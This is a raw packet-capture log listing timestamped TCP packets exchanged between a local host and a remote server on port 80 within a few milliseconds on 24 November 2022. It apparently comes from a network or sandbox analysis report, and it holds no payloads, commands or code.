Nov 24, 2022 12:20:03.534089088 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534104109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534104109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534132004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534135103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534159899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534161091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534184933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534189939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534208059 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534216881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534238100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534245014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534255981 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534271002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534298897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534326077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534332037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534356117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534372091 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534383059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534411907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534435034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534440994 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534460068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534482002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534507990 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534535885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534538031 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534562111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534564972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534584999 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534591913 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534619093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534622908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534647942 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534653902 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534677982 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534693003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534693003 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534707069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534733057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534733057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534760952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534761906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534778118 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534785986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534807920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534810066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534835100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534836054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534856081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534862041 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534887075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.534913063 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534931898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534945011 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534959078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534980059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.534998894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535024881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535027027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535052061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535060883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535080910 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535101891 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535108089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535130978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535130978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535137892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535156965 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535176039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535193920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535201073 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535211086 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535232067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535234928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535253048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535255909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535275936 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535276890 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535291910 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535295963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535309076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535316944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535327911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535336018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535345078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535356998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535372972 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535382986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535391092 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535407066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535408020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535429955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535432100 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535449028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535470009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535473108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535473108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535489082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535494089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535507917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535514116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535531998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535554886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535554886 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535573006 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535573006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535592079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535592079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535593987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535614014 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535618067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535638094 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535648108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535665989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535676003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535706997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535708904 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535727978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535737038 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535753965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535764933 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535784006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535790920 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535816908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535839081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535845041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535857916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535870075 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535878897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535895109 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535900116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535916090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535921097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535934925 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535940886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535950899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535965919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.535968065 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535986900 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.535989046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536009073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536027908 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536031961 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536050081 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536053896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536070108 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536089897 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536111116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536109924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536109924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536129951 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536134005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536163092 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536169052 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536190033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536209106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536220074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536226034 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536250114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536254883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536269903 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536277056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536298037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536318064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536330938 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536336899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536350965 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536356926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536375999 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536391020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536391020 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536397934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536422968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536443949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536456108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536468029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536488056 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536494017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536494970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536516905 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536516905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536542892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536546946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536566973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536582947 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536587000 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536612988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536636114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536658049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536673069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536673069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536680937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536705971 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536736012 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536751032 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536751986 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536780119 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536802053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536823034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536843061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536847115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536863089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536864996 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536876917 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536881924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536901951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536907911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536923885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536937952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536946058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536963940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.536972046 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.536983967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537002087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537005901 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537020922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537039042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537045956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537059069 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537075043 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537079096 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537092924 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537101030 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537123919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537133932 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537144899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537163973 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537169933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537183046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537201881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537220001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537223101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537235975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537242889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537259102 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537271023 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537293911 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537295103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537314892 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537322998 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537334919 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537354946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537354946 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537358046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537372112 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537379980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537388086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537400961 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537415028 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537420988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537441015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537444115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537458897 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537461042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537472010 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537482977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537486076 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537501097 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537503004 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537520885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537529945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537539959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537559986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537570000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537575960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537595987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537599087 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537607908 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537617922 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537636995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537640095 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537657022 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537674904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537676096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537693977 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537695885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537717104 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537729025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537739992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537753105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537759066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537780046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537782907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537800074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537812948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537812948 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537820101 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537834883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537839890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537852049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537864923 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537867069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537885904 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537887096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537905931 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537925959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537928104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537940025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537945986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537964106 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537976027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537976027 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.537990093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.537992001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538017988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538018942 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538038015 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538057089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538057089 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538069963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538085938 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538095951 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538106918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538120031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538134098 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538139105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538156986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538167000 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538167953 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538180113 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538203001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538213968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538213968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538222075 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538233995 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538242102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538261890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538273096 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538283110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538292885 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538311005 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538315058 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538335085 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538336992 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538361073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.538372040 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.538384914 CET	49710	80	192.168.2.3	66.235.200.147
